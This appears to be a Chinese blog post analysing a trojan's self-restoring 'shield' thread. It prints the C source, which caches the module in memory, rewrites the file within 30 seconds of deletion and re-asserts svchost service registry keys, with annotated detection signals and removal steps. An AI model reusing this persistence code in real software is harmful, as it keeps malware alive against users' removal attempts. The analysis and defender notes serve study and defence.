解析木马复活技术-程序被删还会还原


我在无聊之中看到一款源码,下载下来看了以后发现程序会创建一个ShieldThread线程

跟踪下去发现它会把自身读取到一个分配的内存空间,然后每隔一段时间判断自身文件是否存在

如果不存在就从内存中写出文件。具体代码如下

//

// Self-restoring "shield" thread from the analysed sample.  It reads its own
// module image into a heap buffer once, then loops forever: every 30 s it
// checks whether the file still exists on disk, writes the cached image back
// if it does not, and re-asserts the service registry values.
//
// Defender notes (what makes this loop observable, and what ends it):
//   - a deletion of the module path followed within ~30 s by a re-creation of
//     the same path (CREATE_ALWAYS, GENERIC_WRITE) by an already-running process;
//   - periodic writes to HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Start
//     and ...\<ServiceName>\Parameters\ServiceDll, even when nothing changed;
//   - the backup copy lives only in this process's memory (MemDll), so stopping
//     the hosting process first, then removing the file and the service keys,
//     leaves nothing to restore from.
//
// lpParamter: unused.  Returns 0 only if the __try body is left, which the
// while(1) loop never does on its own (an exception is the only exit).
// ShieldFlag, ServerCFG, hDll and WriteRegEx are defined outside this listing.
DWORD WINAPI ShieldThread(LPVOID lpParamter)
{
 char   DllFilePath[MAX_PATH];      // full path of this module on disk
 HANDLE hDllFile;
 HANDLE hSearch;
 void*  MemDll;                     // in-memory copy of the module file
 int    SizeDll;                    // size of that copy in bytes
    DWORD  BytesRead;
 WIN32_FIND_DATA  FileData;
    char   ProtectKey1[MAX_PATH*2],ProtectKey2[MAX_PATH*2];
    // Prefix of the service key; the service name is appended below.
    char * SubRoot="SYSTEM\\CurrentControlSet\\Services\\";
   
 __try
 { 
  ShieldFlag = 1;
  // ProtectKey1 = Services\<ServiceName>; ProtectKey2 = ProtectKey1\Parameters.
  // NOTE(review): the count passed to strncat is the whole buffer size, not the
  // remaining space, so these calls do not bound the append as intended.
  strncpy(ProtectKey1,SubRoot,sizeof(ProtectKey1));
     strncat(ProtectKey1,ServerCFG.ServiceName,sizeof(ProtectKey1)); 
     strncpy(ProtectKey2,ProtectKey1,sizeof(ProtectKey2));
     strncat(ProtectKey2,"\\Parameters",sizeof(ProtectKey2));
     // Resolve this module's own path via the module handle kept in hDll.
     GetModuleFileName(HMODULE(hDll), DllFilePath,MAX_PATH);

     // One-time read of the whole file into a committed, writable region.
     // None of the return values (handle, size, allocation, read) is checked.
     hDllFile =CreateFile(DllFilePath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
     SizeDll  =GetFileSize(hDllFile,0);
     MemDll   =VirtualAlloc(0,SizeDll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
        ReadFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
     CloseHandle(hDllFile);
   
     // Restore loop: existence check, rewrite if missing, re-assert registry, sleep.
     while(1)
  {
    
   // FindFirstFile is used purely as an existence test for the module path.
   hSearch =FindFirstFile(DllFilePath,&FileData);
         if(hSearch==INVALID_HANDLE_VALUE)
   {         
    // File is gone: recreate it from the in-memory copy.
    hDllFile=CreateFile(DllFilePath,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                WriteFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
          CloseHandle(hDllFile);
   } 
   FindClose(hSearch);  // also called when hSearch is INVALID_HANDLE_VALUE
         // Re-write the service values every iteration.  WriteRegEx is a helper
         // defined elsewhere; from the arguments it appears to set Start=2
         // (SERVICE_AUTO_START) and ServiceDll=<this module's path> -- the
         // layout of a svchost-hosted service DLL.  Repeated identical writes
         // to these keys are a useful detection signal.
         WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey1,"Start",REG_DWORD,NULL,2,1);
      WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey2,"ServiceDll",REG_EXPAND_SZ,DllFilePath,NULL,0);
      Sleep(30000);  // 30 s polling interval
  }
 }
 __finally
 {
  // Reached only if the __try body is left (e.g. an exception).  Both
  // handles have normally already been closed above, so this closes them
  // a second time; MemDll is never released.
  CloseHandle(hDllFile);
  FindClose(hSearch);
 }
 return 0;
}
